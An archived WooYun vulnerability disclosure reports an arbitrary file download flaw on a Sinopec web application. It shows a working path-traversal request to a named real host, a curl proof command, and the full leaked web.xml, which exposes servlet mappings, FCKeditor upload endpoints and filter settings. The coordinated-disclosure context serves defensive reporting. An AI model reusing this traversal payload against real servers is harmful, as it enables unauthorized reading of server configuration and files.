中石化某业务存在任意文件下载漏洞 | wooyun-2014-085772| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085772

漏洞标题：中石化某业务存在任意文件下载漏洞

漏洞作者： jusker

提交时间：2014-12-04 11:42

修复时间：2015-01-18 11:44

公开时间：2015-01-18 11:44

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-04：细节已通知厂商并且等待厂商处理中
2014-12-09：厂商已经确认，细节仅向厂商公开
2014-12-19：细节向核心白帽子及相关领域专家公开
2014-12-29：细节向普通白帽子公开
2015-01-08：细节向实习白帽子公开
2015-01-18：细节向公众公开

简要描述：

不想解释太多，猜解就完事，点到为止

详细说明：

http://ppt.edri.sinopec.com:80/CN/item/downloadFile.jsp?filedisplay=../../WEB-INF/web.xml

漏洞证明：

curl http://ppt.edri.sinopec.com/CN/item/downloadFile.jsp?filedisplay=../../WEB-INF/web.xml|more
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1215    0  1215    0     0  20881      0 --:--:-- --:--:-- --:--:-- 23823<U+FEFF><?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
        <display-name>WKXT Application</display-name>
        <context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value>
     /WEB-INF/applicationContext.xml
    </param-value>
  </context-param>
<!-- spring 启动配置 1表示自动启动-->
 <servlet>
    <servlet-name>context</servlet-name>
    <servlet-class>
      org.springframework.web.context.ContextLoaderServlet
   </servlet-class>
   <load-on-startup>1</load-on-startup>
</servlet>
        <filter>
                <filter-name>CharacterEncodingFilter</filter-name>
                <filter-class>
                        com.lyt.util.web.CharacterEncodingFilter
100 22272    0 22272    0     0   269k      0 --:--:-- --:--:-- --:--:--  293k
xsstest:219.143.118.1779001 xssshell$ curl http://ppt.edri.sinopec.com/CN/item/downloadFile.jsp?filedisplay=../../WEB-INF/web.xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
	<display-name>WKXT Application</display-name>
	<context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value>
     /WEB-INF/applicationContext.xml
    </param-value>
  </context-param>
<!-- spring 启动配置 1表示自动启动-->
 <servlet>
    <servlet-name>context</servlet-name>
    <servlet-class>
      org.springframework.web.context.ContextLoaderServlet
   </servlet-class>
   <load-on-startup>1</load-on-startup>
</servlet>
	<filter>
		<filter-name>CharacterEncodingFilter</filter-name>
		<filter-class>
			com.lyt.util.web.CharacterEncodingFilter
		</filter-class>
		<init-param>
			<param-name>encoding</param-name>
			<param-value>UTF-8</param-value>
		</init-param>
	</filter>
       <filter>
  		<description>解决SQL注入问   XSS(跨站脚本弱点) CSRF(跨站请求伪造)</description>
  		<display-name>XssFilter</display-name>
  		<filter-name>XssFilter</filter-name>
  		<filter-class>com.magtech.filter.XssFilter</filter-class>
  		<init-param>
            <description>要被过滤掉的字符列表，空格分开</description>
            <param-name>delete</param-name>
            <param-value>exec insert delete update count chr mid master truncate char declare</param-value>
        </init-param>
        <init-param>
            <description>要过滤的表单参数名，用空格分开，不在本列表中的参数将不被过滤，以提高效率.不写则过滤所有表单参数</description>
            <param-name>param</param-name>
            <param-value></param-value>
        </init-param>
        
  	</filter>
  	<filter-mapping>
  		<filter-name>XssFilter</filter-name>
  		<url-pattern>/CN/*</url-pattern>
  	</filter-mapping>
  	<filter-mapping>
  		<filter-name>XssFilter</filter-name>
  		<url-pattern>/EN/*</url-pattern>
  	</filter-mapping>
	<filter-mapping>
		<filter-name>CharacterEncodingFilter</filter-name>
		<url-pattern>/*</url-pattern>
	</filter-mapping>
	<filter>  
	        <filter-name>UrlRewriteFilter</filter-name>  
	        <filter-class>  
	            org.tuckey.web.filters.urlrewrite.UrlRewriteFilter   
	        </filter-class>  
	    </filter>  
	    <filter-mapping>  
	        <filter-name>UrlRewriteFilter</filter-name>  
	        <url-pattern>/*</url-pattern>  
	</filter-mapping>		
	<servlet>
		<servlet-name>action</servlet-name>
		<servlet-class>
			org.apache.struts.action.ActionServlet
		</servlet-class>
		<init-param>
			<param-name>config/pay</param-name>
			<param-value>/WEB-INF/struts-common.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config</param-name>
			<param-value>/WEB-INF/struts-config.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage</param-name>
			<param-value>/WEB-INF/struts-manage.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/manage/volumn</param-name>
			<param-value>/WEB-INF/struts-volumn-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/article</param-name>
			<param-value>/WEB-INF/struts-article-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/article</param-name>
			<param-value>/WEB-INF/struts-article-cn.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/EN/article</param-name>
			<param-value>/WEB-INF/struts-article-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/emag</param-name>
			<param-value>/WEB-INF/struts-emag-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/emag</param-name>
			<param-value>/WEB-INF/struts-emag-cn.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/EN/emag</param-name>
			<param-value>/WEB-INF/struts-emag-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/attach</param-name>
			<param-value>/WEB-INF/struts-attach.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/subject</param-name>
			<param-value>/WEB-INF/struts-subject.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/domain</param-name>
			<param-value>/WEB-INF/struts-domain.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/field</param-name>
			<param-value>/WEB-INF/struts-field.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/channel</param-name>
			<param-value>/WEB-INF/struts-channel.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/finance</param-name>
			<param-value>/WEB-INF/struts-finance-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/finance</param-name>
			<param-value>/WEB-INF/struts-finance-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/finance</param-name>
			<param-value>/WEB-INF/struts-finance-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/money</param-name>
			<param-value>/WEB-INF/struts-money-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/pay</param-name>
			<param-value>/WEB-INF/struts-money.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/user</param-name>
			<param-value>/WEB-INF/struts-user-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/user</param-name>
			<param-value>/WEB-INF/struts-user-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/user</param-name>
			<param-value>/WEB-INF/struts-user-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/author</param-name>
			<param-value>/WEB-INF/struts-author-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/keyword</param-name>
			<param-value>/WEB-INF/struts-keyword-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/journal</param-name>
			<param-value>/WEB-INF/struts-journal.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/column</param-name>
			<param-value>/WEB-INF/struts-column-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/item</param-name>
			<param-value>/WEB-INF/struts-item-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/item</param-name>
			<param-value>/WEB-INF/struts-item-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/item</param-name>
			<param-value>/WEB-INF/struts-item-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/rss</param-name>
			<param-value>/WEB-INF/struts-rss-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/rss</param-name>
			<param-value>/WEB-INF/struts-rss-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/rss</param-name>
			<param-value>/WEB-INF/struts-rss-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/feedback</param-name>
			<param-value>/WEB-INF/struts-feedback-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/CN/feedback</param-name>
			<param-value>/WEB-INF/struts-feedback-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/feedback</param-name>
			<param-value>/WEB-INF/struts-feedback-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/CN/order</param-name>
			<param-value>/WEB-INF/struts-order-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/order</param-name>
			<param-value>/WEB-INF/struts-order-en.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/order</param-name>
			<param-value>/WEB-INF/struts-order-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/alert</param-name>
			<param-value>/WEB-INF/struts-alert-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/browse</param-name>
			<param-value>/WEB-INF/struts-browse.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/download</param-name>
			<param-value>/WEB-INF/struts-download.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/alertorder</param-name>
			<param-value>/WEB-INF/struts-alertorder-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/CN/alert</param-name>
			<param-value>/WEB-INF/struts-alert-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/alert</param-name>
			<param-value>/WEB-INF/struts-alert-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/ipaddr</param-name>
			<param-value>/WEB-INF/struts-ipaddr-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/CN/comment</param-name>
			<param-value>/WEB-INF/struts-comment-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/comment</param-name>
			<param-value>/WEB-INF/struts-comment-en.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/comment</param-name>
			<param-value>/WEB-INF/struts-comment-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/template</param-name>
			<param-value>/WEB-INF/struts-template.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/click</param-name>
			<param-value>/WEB-INF/struts-click.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/news</param-name>
			<param-value>/WEB-INF/struts-news-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/news</param-name>
			<param-value>/WEB-INF/struts-news-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/news</param-name>
			<param-value>/WEB-INF/struts-news-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/folder</param-name>
			<param-value>/WEB-INF/struts-folder-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/model</param-name>
			<param-value>/WEB-INF/struts-model-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/down</param-name>
			<param-value>/WEB-INF/struts-down-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/mail</param-name>
			<param-value>/WEB-INF/struts-mail-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/adv</param-name>
			<param-value>/WEB-INF/struts-adv-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/location</param-name>
			<param-value>/WEB-INF/struts-location-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/location</param-name>
			<param-value>/WEB-INF/struts-location-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/location</param-name>
			<param-value>/WEB-INF/struts-location-en.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/type</param-name>
			<param-value>/WEB-INF/struts-type.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/provider</param-name>
			<param-value>/WEB-INF/struts-provider-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/provider</param-name>
			<param-value>/WEB-INF/struts-provider-cn.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/goods</param-name>
			<param-value>/WEB-INF/struts-goods-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/goods</param-name>
			<param-value>/WEB-INF/struts-goods-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/goods</param-name>
			<param-value>/WEB-INF/struts-goods-en.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/manage/certificate</param-name>
			<param-value>/WEB-INF/struts-certificate-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/certificate</param-name>
			<param-value>/WEB-INF/struts-certificate-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/createview</param-name>
			<param-value>/WEB-INF/struts-createview-ht.xml</param-value>
		</init-param>		
		<init-param>
			<param-name>config/manage/subscribersort</param-name>
			<param-value>/WEB-INF/struts-subscribersort-ht.xml</param-value>
		</init-param>				
		<init-param>
			<param-name>config/manage/sortdetail</param-name>
			<param-value>/WEB-INF/struts-sortdetail-ht.xml</param-value>
		</init-param>			
		<init-param>
			<param-name>config/manage/vm</param-name>
			<param-value>/WEB-INF/struts-vm-ht.xml</param-value>
		</init-param>	
			<init-param>
			<param-name>config/manage/reference</param-name>
			<param-value>/WEB-INF/struts-reference.xml</param-value>
		</init-param>	
		<init-param>
			<param-name>config/manage/xmlarticlecontent</param-name>
			<param-value>/WEB-INF/struts-xmlarticlecontent.xml</param-value>
		</init-param>	
			<init-param>
			<param-name>config/manage/articlemonthcount</param-name>
			<param-value>/WEB-INF/struts-articlemonthcount.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/conference</param-name>
			<param-value>/WEB-INF/struts-conference-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/conference</param-name>
			<param-value>/WEB-INF/struts-conference-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/entryperson</param-name>
			<param-value>/WEB-INF/struts-entryperson-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/entrypersonfield</param-name>
			<param-value>/WEB-INF/struts-entrypersonfield.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/entryperson</param-name>
			<param-value>/WEB-INF/struts-entryperson-ht.xml</param-value>
		</init-param>
		
		<init-param>
			<param-name>config/manage/entrypersonfielddetail</param-name>
			<param-value>/WEB-INF/struts-entrypersonfielddetail-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/conference</param-name>
			<param-value>/WEB-INF/struts-conference-en.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/entryperson</param-name>
			<param-value>/WEB-INF/struts-entryperson-en.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/adInfo</param-name>
			<param-value>/WEB-INF/struts-adInfo-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/abstract</param-name>
			<param-value>/WEB-INF/struts-countbytime-address-cn.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/EN/abstract</param-name>
			<param-value>/WEB-INF/struts-countbytime-address-en.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/manage/wenjuan</param-name>
			<param-value>/WEB-INF/struts-wenjuan-ht.xml</param-value>
		</init-param>
		<init-param>
			<param-name>config/CN/wenjuan</param-name>
			<param-value>/WEB-INF/struts-wenjuan-cn.xml</param-value>
		</init-param>
		<load-on-startup>2</load-on-startup>
	</servlet>
	<servlet>
		<servlet-name>getTraceNumImage</servlet-name>
		<servlet-class>
			com.lyt.util.web.GetTraceNumImageServlet
		</servlet-class>
	</servlet>
	<servlet>
		<servlet-name>download</servlet-name>
		<servlet-class>
			com.wkxt.article.web.action.DownloadServlet
		</servlet-class>
		<init-param>
			<param-name>length</param-name>
			<param-value>4096</param-value>
		</init-param>
	</servlet>
<servlet>
<servlet-name>Connector</servlet-name>
    <servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
    <init-param>
     <param-name>baseDir</param-name>
<!-- ??????????????????????????/[???]/UserFiles/?
????????????????????????????????????
webroot\upload??????????https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/??? -->
     <param-value>/UserFiles/</param-value>
    </init-param>
</servlet>    
 <servlet>
        <servlet-name>SimpleUploader</servlet-name>
        <servlet-class>
            com.fredck.FCKeditor.uploader.SimpleUploaderServlet
        </servlet-class>
        <init-param>
            <param-name>baseDir</param-name>
            <!-- ????????????WebRoot ????? UserFiles ??? -->
            <!-- ?????????????????? Image?Flash -->
            <param-value>/UserFiles/</param-value>
        </init-param>
        <init-param>
            <param-name>debug</param-name>
            <param-value>true</param-value>
        </init-param>
        <init-param>
            <!-- ???????????? -->
            <param-name>enabled</param-name>
            <param-value>true</param-value>
        </init-param>
        <init-param>
            <param-name>AllowedExtensionsFile</param-name>
            <param-value></param-value>
        </init-param>
        <init-param>
            <!-- ?????????????????????? -->
            <param-name>DeniedExtensionsFile</param-name>
            <param-value>
                php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi
            </param-value>
        </init-param>
        <init-param>
            <param-name>AllowedExtensionsImage</param-name>
            <param-value>jpg|gif|jpeg|png|bmp</param-value>
        </init-param>
        <init-param>
            <param-name>DeniedExtensionsImage</param-name>
            <param-value></param-value>
        </init-param>
        <init-param>
            <param-name>AllowedExtensionsFlash</param-name>
            <param-value>swf|fla</param-value>
        </init-param>
        <init-param>
            <param-name>DeniedExtensionsFlash</param-name>
            <param-value></param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>
      <servlet-mapping>
      <servlet-name>Connector</servlet-name>
      <url-pattern>
       /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector
      </url-pattern>
    </servlet-mapping>
<!-- ???????????????-->
  
    <servlet-mapping>
      <servlet-name>SimpleUploader</servlet-name>
      <url-pattern>/FCKeditor/editor/filemanagerhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/simpleuploader</url-pattern>
    </servlet-mapping>	
	<servlet-mapping>
		<servlet-name>action</servlet-name>
		<url-pattern>*.do</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>getTraceNumImage</servlet-name>
		<url-pattern>*.traceImg</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
	<servlet-name>download</servlet-name>
	<url-pattern>/servlet/download</url-pattern>
	</servlet-mapping>
	<!-- The Usual Welcome File List -->
	<welcome-file-list>
		<welcome-file>index.jsp</welcome-file>
	</welcome-file-list>
	
    <error-page>  
        <error-code>404</error-code>
        <location>/error/404.jsp</location>
	</error-page>  
	<error-page>  
	        <error-code>500</error-code>  
	        <location>/error/500.jsp</location>  
	</error-page>
	<!-- Struts Tag Library Descriptors -->
	<jsp-config>
		<taglib>
			<taglib-uri>/tags/struts-bean</taglib-uri>
			<taglib-location>/WEB-INF/tld/struts-bean.tld</taglib-location>
		</taglib>
		<taglib>
			<taglib-uri>/tags/struts-html</taglib-uri>
			<taglib-location>/WEB-INF/tld/struts-html.tld</taglib-location>
		</taglib>
		<taglib>
			<taglib-uri>/tags/struts-logic</taglib-uri>
			<taglib-location>/WEB-INF/tld/struts-logic.tld</taglib-location>
		</taglib>
		<taglib>
			<taglib-uri>/tags/struts-tiles</taglib-uri>
			<taglib-location>/WEB-INF/tld/struts-tiles.tld</taglib-location>
		</taglib>
		<taglib>
			<taglib-uri>/tags/struts-tiles</taglib-uri>
			<taglib-location>/WEB-INF/tld/pager.tld</taglib-location>
		</taglib>
		<taglib>  
            <taglib-uri>http://java.sun.com/jstl/fmt</taglib-uri>  
            <taglib-location>/WEB-INF/tld/fmt.tld</taglib-location>  
        </taglib>  
          
        <taglib>  
            <taglib-uri>http://java.sun.com/jstl/fmt-rt</taglib-uri>  
            <taglib-location>/WEB-INF/tld/fmt-rt.tld</taglib-location>  
        </taglib>  
          
        <taglib>  
            <taglib-uri>http://java.sun.com/jstl/core</taglib-uri>  
            <taglib-location>/WEB-INF/tld/c.tld</taglib-location>  
        </taglib>  
          
        <taglib>  
            <taglib-uri>http://java.sun.com/jstl/core-rt</taglib-uri>  
            <taglib-location>/WEB-INF/tld/c-rt.tld</taglib-location>  
        </taglib>  
        <taglib>
            <taglib-uri>http://java.sun.com/jsp/jstl/functions</taglib-uri>  
            <taglib-location>/WEB-INF/tld/fn.tld</taglib-location>  
        </taglib> 
	</jsp-config>
    <listener>
        <listener-class>
            com.wkxt.web.action.SessionsCountListener
        </listener-class>
    </listener>
    <filter>
    	<filter-name>AuthenticationFilter</filter-name>
    	<filter-class>com.lyt.util.filter.AuthenticationFilter</filter-class>
    </filter>
    <filter>
    	<filter-name>CountDayBrowseFilter</filter-name>
    	<filter-class>com.lyt.util.filter.CountDayBrowseFilter</filter-class>
    </filter>
    <filter-mapping>
    	<filter-name>AuthenticationFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping>
    <filter-mapping>
    	<filter-name>CountDayBrowseFilter</filter-name>
    	<url-pattern>/*</url-pattern>
    </filter-mapping>
</web-app>

修复方案：

版权声明：转载请注明来源 jusker@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-12-09 09:01

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085772

漏洞标题：中石化某业务存在任意文件下载漏洞

相关厂商：中石化

漏洞作者： jusker

提交时间：2014-12-04 11:42

修复时间：2015-01-18 11:44

公开时间：2015-01-18 11:44

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jusker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-085772

漏洞标题：中石化某业务存在任意文件下载漏洞

相关厂商：中石化

漏洞作者： jusker

提交时间：2014-12-04 11:42

修复时间：2015-01-18 11:44

公开时间：2015-01-18 11:44

漏洞类型：任意文件遍历/下载

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-085772"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 jusker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：